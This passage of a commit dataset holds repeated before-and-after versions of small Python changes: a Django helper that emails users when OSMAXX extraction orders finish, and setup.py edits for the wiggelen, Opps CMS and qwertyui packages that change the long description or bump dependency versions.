_('The extraction of the order "%(order_id)s" has been finished.') % {
'order_id': self.extraction_order.id
},
email=True
)
self.extraction_order.state = models.ExtractionOrderState.FINISHED
self.extraction_order.save()
def inform_user(self, message_type, message_text, email=True):
stored_messages.api.add_message_for(
users=[self.user],
level=message_type,
message_text=message_text
)
if email:
if hasattr(self.user, 'email'):
send_mail(
'[OSMAXX] '+message_text,
message_text,
'no-reply@osmaxx.hsr.ch',
[self.user.email]
)
else:
self.inform_user(
messages.WARNING,
_("There is no email address assigned to your account. "
"You won't be notified by email on process finish!"),
email=False
)
| <commit_before>from django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
class ConverterHelper:
def __init__(self, extraction_order):
self.extraction_order = extraction_order
self.user = extraction_order.orderer
def file_conversion_finished(self):
if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
self.inform_user(
messages.SUCCESS,
_('The extraction of the order "%(order_id)s" has been finished.') % {
'order_id': self.extraction_order.id
},
email=True
)
self.extraction_order.state = models.ExtractionOrderState.FINISHED
self.extraction_order.save()
def inform_user(self, message_type, message_text, email=True):
stored_messages.api.add_message_for(
users=[self.user],
level=message_type,
message_text=message_text
)
if email:
if hasattr(self.user, 'email'):
send_mail(
'[OSMAXX] '+message_text,
message_text,
'no-reply@osmaxx.hsr.ch',
[self.user.email]
)
else:
self.inform_user(
messages.WARNING,
_("There is no email address assigned to your account. "
"You won't be notified by email on process finish!"),
email=False
)
<commit_msg>Document reason for class instead of free function<commit_after> | from django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
# functions using database (extraction_order) must be instance methods of a class
# -> free functions will not work: database connection error
class ConverterHelper:
def __init__(self, extraction_order):
self.extraction_order = extraction_order
self.user = extraction_order.orderer
def file_conversion_finished(self):
if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
self.inform_user(
messages.SUCCESS,
_('The extraction of the order "%(order_id)s" has been finished.') % {
'order_id': self.extraction_order.id
},
email=True
)
self.extraction_order.state = models.ExtractionOrderState.FINISHED
self.extraction_order.save()
def inform_user(self, message_type, message_text, email=True):
stored_messages.api.add_message_for(
users=[self.user],
level=message_type,
message_text=message_text
)
if email:
if hasattr(self.user, 'email'):
send_mail(
'[OSMAXX] '+message_text,
message_text,
'no-reply@osmaxx.hsr.ch',
[self.user.email]
)
else:
self.inform_user(
messages.WARNING,
_("There is no email address assigned to your account. "
"You won't be notified by email on process finish!"),
email=False
)
| from django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
class ConverterHelper:
def __init__(self, extraction_order):
self.extraction_order = extraction_order
self.user = extraction_order.orderer
def file_conversion_finished(self):
if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
self.inform_user(
messages.SUCCESS,
_('The extraction of the order "%(order_id)s" has been finished.') % {
'order_id': self.extraction_order.id
},
email=True
)
self.extraction_order.state = models.ExtractionOrderState.FINISHED
self.extraction_order.save()
def inform_user(self, message_type, message_text, email=True):
stored_messages.api.add_message_for(
users=[self.user],
level=message_type,
message_text=message_text
)
if email:
if hasattr(self.user, 'email'):
send_mail(
'[OSMAXX] '+message_text,
message_text,
'no-reply@osmaxx.hsr.ch',
[self.user.email]
)
else:
self.inform_user(
messages.WARNING,
_("There is no email address assigned to your account. "
"You won't be notified by email on process finish!"),
email=False
)
Document reason for class instead of free functionfrom django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
# functions using database (extraction_order) must be instance methods of a class
# -> free functions will not work: database connection error
class ConverterHelper:
def __init__(self, extraction_order):
self.extraction_order = extraction_order
self.user = extraction_order.orderer
def file_conversion_finished(self):
if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
self.inform_user(
messages.SUCCESS,
_('The extraction of the order "%(order_id)s" has been finished.') % {
'order_id': self.extraction_order.id
},
email=True
)
self.extraction_order.state = models.ExtractionOrderState.FINISHED
self.extraction_order.save()
def inform_user(self, message_type, message_text, email=True):
stored_messages.api.add_message_for(
users=[self.user],
level=message_type,
message_text=message_text
)
if email:
if hasattr(self.user, 'email'):
send_mail(
'[OSMAXX] '+message_text,
message_text,
'no-reply@osmaxx.hsr.ch',
[self.user.email]
)
else:
self.inform_user(
messages.WARNING,
_("There is no email address assigned to your account. "
"You won't be notified by email on process finish!"),
email=False
)
| <commit_before>from django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
class ConverterHelper:
def __init__(self, extraction_order):
self.extraction_order = extraction_order
self.user = extraction_order.orderer
def file_conversion_finished(self):
if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
self.inform_user(
messages.SUCCESS,
_('The extraction of the order "%(order_id)s" has been finished.') % {
'order_id': self.extraction_order.id
},
email=True
)
self.extraction_order.state = models.ExtractionOrderState.FINISHED
self.extraction_order.save()
def inform_user(self, message_type, message_text, email=True):
stored_messages.api.add_message_for(
users=[self.user],
level=message_type,
message_text=message_text
)
if email:
if hasattr(self.user, 'email'):
send_mail(
'[OSMAXX] '+message_text,
message_text,
'no-reply@osmaxx.hsr.ch',
[self.user.email]
)
else:
self.inform_user(
messages.WARNING,
_("There is no email address assigned to your account. "
"You won't be notified by email on process finish!"),
email=False
)
<commit_msg>Document reason for class instead of free function<commit_after>from django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
# functions using database (extraction_order) must be instance methods of a class
# -> free functions will not work: database connection error
class ConverterHelper:
def __init__(self, extraction_order):
self.extraction_order = extraction_order
self.user = extraction_order.orderer
def file_conversion_finished(self):
if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
self.inform_user(
messages.SUCCESS,
_('The extraction of the order "%(order_id)s" has been finished.') % {
'order_id': self.extraction_order.id
},
email=True
)
self.extraction_order.state = models.ExtractionOrderState.FINISHED
self.extraction_order.save()
def inform_user(self, message_type, message_text, email=True):
stored_messages.api.add_message_for(
users=[self.user],
level=message_type,
message_text=message_text
)
if email:
if hasattr(self.user, 'email'):
send_mail(
'[OSMAXX] '+message_text,
message_text,
'no-reply@osmaxx.hsr.ch',
[self.user.email]
)
else:
self.inform_user(
messages.WARNING,
_("There is no email address assigned to your account. "
"You won't be notified by email on process finish!"),
email=False
)
|
010416fd3888aeae2ab0b50a5d9b02ad23f5cab3 | setup.py | setup.py | import sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=distmeta.__doc__,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
| import sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
with open('README.rst') as readme:
long_description = readme.read()
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=long_description,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
| Use README.rst as long description for PyPi | Use README.rst as long description for PyPi
| Python | mit | martijnvermaat/wiggelen | import sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=distmeta.__doc__,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
Use README.rst as long description for PyPi | import sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
with open('README.rst') as readme:
long_description = readme.read()
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=long_description,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
| <commit_before>import sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=distmeta.__doc__,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
<commit_msg>Use README.rst as long description for PyPi<commit_after> | import sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
with open('README.rst') as readme:
long_description = readme.read()
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=long_description,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
| import sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=distmeta.__doc__,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
Use README.rst as long description for PyPiimport sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
with open('README.rst') as readme:
long_description = readme.read()
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=long_description,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
| <commit_before>import sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=distmeta.__doc__,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
<commit_msg>Use README.rst as long description for PyPi<commit_after>import sys
from setuptools import setup
if sys.version_info < (2, 6):
raise Exception('Wiggelen requires Python 2.6 or higher.')
# Todo: How does this play with pip freeze requirement files?
requires = ['nose']
# Python 2.6 does not include the argparse module.
try:
import argparse
except ImportError:
requires.append('argparse')
with open('README.rst') as readme:
long_description = readme.read()
import wiggelen as distmeta
setup(
name='wiggelen',
version=distmeta.__version__,
description='Working with wiggle tracks in Python',
long_description=long_description,
author=distmeta.__author__,
author_email=distmeta.__contact__,
url=distmeta.__homepage__,
license='MIT License',
platforms=['any'],
packages=['wiggelen'],
requires=requires,
entry_points = {
'console_scripts': ['wiggelen = wiggelen.commands:main']
},
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
keywords='bioinformatics'
)
|
efd13e069e7fa986f7fe68dfe5dc5256cfc68750 | setup.py | setup.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.4", "south>=0.7"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
| #!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.5",
"south>=0.7",
"Pillow==1.7.8",
"django-filebrowser==3.5.1",
"django-redis",
"django-redactor"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
| Add new libs python on install requires Opps CMS | Add new libs python on install requires Opps CMS
| Python | mit | YACOWS/opps,opps/opps,YACOWS/opps,jeanmask/opps,jeanmask/opps,YACOWS/opps,opps/opps,williamroot/opps,williamroot/opps,jeanmask/opps,jeanmask/opps,williamroot/opps,opps/opps,YACOWS/opps,williamroot/opps,opps/opps | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.4", "south>=0.7"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
Add new libs python on install requires Opps CMS | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.5",
"south>=0.7",
"Pillow==1.7.8",
"django-filebrowser==3.5.1",
"django-redis",
"django-redactor"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
| <commit_before>#!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.4", "south>=0.7"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
<commit_msg>Add new libs python on install requires Opps CMS<commit_after> | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.5",
"south>=0.7",
"Pillow==1.7.8",
"django-filebrowser==3.5.1",
"django-redis",
"django-redactor"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
| #!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.4", "south>=0.7"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
Add new libs python on install requires Opps CMS#!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.5",
"south>=0.7",
"Pillow==1.7.8",
"django-filebrowser==3.5.1",
"django-redis",
"django-redactor"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
| <commit_before>#!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.4", "south>=0.7"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
<commit_msg>Add new libs python on install requires Opps CMS<commit_after>#!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
import opps
install_requires = ["Django>=1.5",
"south>=0.7",
"Pillow==1.7.8",
"django-filebrowser==3.5.1",
"django-redis",
"django-redactor"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules',]
try:
long_description = open('README.md').read()
except:
long_description = opps.__description__
setup(name='opps',
version = opps.__version__,
description = opps.__description__,
long_description = long_description,
classifiers = classifiers,
keywords = 'opps cms django apps magazines websites',
author = opps.__author__,
author_email = opps.__email__,
url = 'http://oppsproject.org',
download_url = "https://github.com/avelino/opps/tarball/master",
license = opps.__license__,
packages = find_packages(exclude=('doc',)),
package_dir = {'opps': 'opps'},
install_requires = install_requires,
include_package_data = True,
)
|
47903d4e8ff4e2adfc9a05b8145923154d7ff57e | setup.py | setup.py | #!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.21',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==2.2.4',
'requests==2.18.4',
'requests-toolbelt==0.8.0',
]
)
| #!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.22',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==4.0.3',
'requests==2.19.1',
'requests-toolbelt==0.8.0',
]
)
| Update package versions, bump to 1.0.22 | Update package versions, bump to 1.0.22
| Python | mit | CGenie/qwertyui | #!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.21',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==2.2.4',
'requests==2.18.4',
'requests-toolbelt==0.8.0',
]
)
Update package versions, bump to 1.0.22 | #!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.22',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==4.0.3',
'requests==2.19.1',
'requests-toolbelt==0.8.0',
]
)
| <commit_before>#!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.21',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==2.2.4',
'requests==2.18.4',
'requests-toolbelt==0.8.0',
]
)
<commit_msg>Update package versions, bump to 1.0.22<commit_after> | #!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.22',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==4.0.3',
'requests==2.19.1',
'requests-toolbelt==0.8.0',
]
)
| #!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.21',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==2.2.4',
'requests==2.18.4',
'requests-toolbelt==0.8.0',
]
)
Update package versions, bump to 1.0.22#!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.22',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==4.0.3',
'requests==2.19.1',
'requests-toolbelt==0.8.0',
]
)
| <commit_before>#!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='qwertyui',
version='1.0.21',
description='Some common Python functions and algorithms',
author='Przemyslaw Kaminski',
author_email='cgenie@gmail.com',
url='https://github.com/CGenie/qwertyui',
packages=find_packages(exclude=['tests.py']),
install_requires=[
'minio==2.2.4',
'requests==2.18.4',
'requests-toolbelt==0.8.0',
]
)
